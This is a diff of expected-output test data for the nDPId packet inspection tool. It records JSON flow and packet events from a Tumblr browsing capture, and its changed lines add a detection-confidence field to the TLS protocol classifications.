-00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00972{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605292122439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":203,"pkt_l4_len":149,"ts_msec":1605292122439,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRAJUGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v3+ZlfzugBgB9aL3AAABAQgKG7m5ccLd3lMXAwMAcFVxaXihuhejZCNpZ5nuv6bEN9Yj5XMBxAt2QHwyRgmT6ybDwC5C73DyglYgxmIhMzt282zpUtE5GphT7ONBXskP6qssi1eNQHysgmBFeTvR+6kSeL0yhYhtFPIEYfWd8KPo3wOHIQIgFNXMNqMrZ9Q="}
 00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605292122501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":149,"pkt_l4_len":95,"ts_msec":1605292122501,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMAF8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoadXXNVgBgB9QaPAAABAQgKTYUvYcLdm\/0XAwMAOgAAAAAAAAAIvZM7k4G8cjK7Q9\/YrVI4eMbPvi74lWEwjtUtgcQJsZEKgX5x1KPe5+ARIWOSp6YRK8o="}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122674,"flow_last_seen":1605292122674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605292122674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605292122674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292122674,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9u8AAAAAoAL9IJXTAAACBAWgBAIIChNnJ60AAAAAAQMDBw=="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24691,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605292122697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292122697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY\/FghbGM8FfbwoBJXgNHxAAACBAV4AQMDAwQCCArC3eI6E2cnrQ=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24692,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9vBYIWxkgBAB+1XrAAABAQgKE2cnxcLd4jo="}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122698,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gCuvGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoVprIBu3ASIMYXhL6qgBAB9S93AAABAQgKNSTnjcLdLMU="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24706,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292122741,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAEpymhUqAcsBIEmLB5kd7IUo3\/YpAbumsheEvqpwEiDHgBALdyXtAAABAQgKwt3iZjUkMfM="}
-00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122874,"flow_last_seen":1605292122874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122874,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605292122874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292122874,"pkt":"qtsDr8lk5EKm5WPyht1gDJQ7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnP4Bu4CgSN\/gvLosgBAB9qrlAAABAQgK1OQQnsLdMvM="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292122899,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuc\/uC8uiyAoEjggBALQrp6AAABAQgKwt3jAtThR68="}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00631{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00684{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
